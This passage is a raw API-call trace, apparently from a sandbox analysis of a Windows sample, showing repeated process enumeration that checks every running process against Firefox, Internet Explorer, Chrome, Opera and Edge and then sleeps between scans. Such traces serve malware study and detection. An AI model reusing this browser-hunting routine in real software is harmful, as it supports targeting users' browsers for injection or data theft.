th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.333] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.333] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.333] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.333] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0171.333] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.334] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0171.334] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.334] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0171.335] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0171.335] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0171.335] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0171.335] lstrcmpiA (lpString1="regsvr32.exe", lpString2="opera.exe") returned 1 [0171.335] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0171.335] CloseHandle (hObject=0xe8) returned 1 [0171.335] Sleep (dwMilliseconds=0x3e8) [0172.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0172.389] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.389] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0172.389] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0172.389] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0172.389] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0172.389] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0172.389] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0172.390] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0172.390] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0172.390] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0172.390] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0172.390] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0172.390] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0172.391] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0172.391] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0172.391] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0172.391] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0172.391] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.391] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.391] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0172.391] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0172.391] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0172.391] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0172.391] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.391] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0172.392] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0172.392] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0172.392] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0172.392] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0172.392] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.392] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.392] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0172.392] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0172.392] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0172.392] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0172.392] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.392] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0172.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0172.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0172.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0172.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0172.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.393] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0172.394] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0172.394] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0172.394] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0172.394] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0172.394] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.394] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0172.394] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0172.394] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0172.394] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0172.394] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0172.394] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.394] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0172.395] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0172.395] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0172.395] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0172.395] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0172.395] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.395] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.395] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.395] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.395] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.395] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.396] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.396] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.396] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.396] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.396] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.396] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.396] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.396] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.397] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.397] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.397] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.398] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.398] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.398] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.398] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.398] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.398] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0172.399] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0172.399] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0172.399] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0172.399] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0172.399] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.399] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.399] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.399] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.399] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.399] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.399] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.399] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.400] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.400] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.400] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.400] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.400] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.400] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0172.400] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0172.400] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0172.400] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0172.400] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0172.400] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.401] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0172.401] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0172.401] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0172.401] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0172.401] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0172.401] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.401] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0172.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0172.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0172.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0172.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0172.402] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.402] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.402] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.402] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.402] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.402] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0172.402] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.402] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0172.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0172.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0172.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0172.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0172.403] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.403] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0172.403] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0172.403] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0172.403] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0172.404] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0172.404] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.404] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0172.404] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0172.404] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0172.404] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0172.404] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0172.404] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.404] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0172.405] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0172.405] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0172.405] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0172.405] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0172.405] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.405] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0172.405] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0172.405] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0172.405] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0172.405] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0172.406] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0172.406] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0172.406] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0172.406] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0172.406] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0172.406] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0172.407] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0172.407] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0172.407] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0172.407] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0172.407] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.407] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0172.407] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0172.407] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0172.407] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0172.407] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0172.407] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.407] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0172.408] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0172.408] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0172.408] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0172.408] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0172.408] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.408] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0172.409] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0172.409] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0172.409] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0172.409] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0172.409] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.409] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0172.409] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 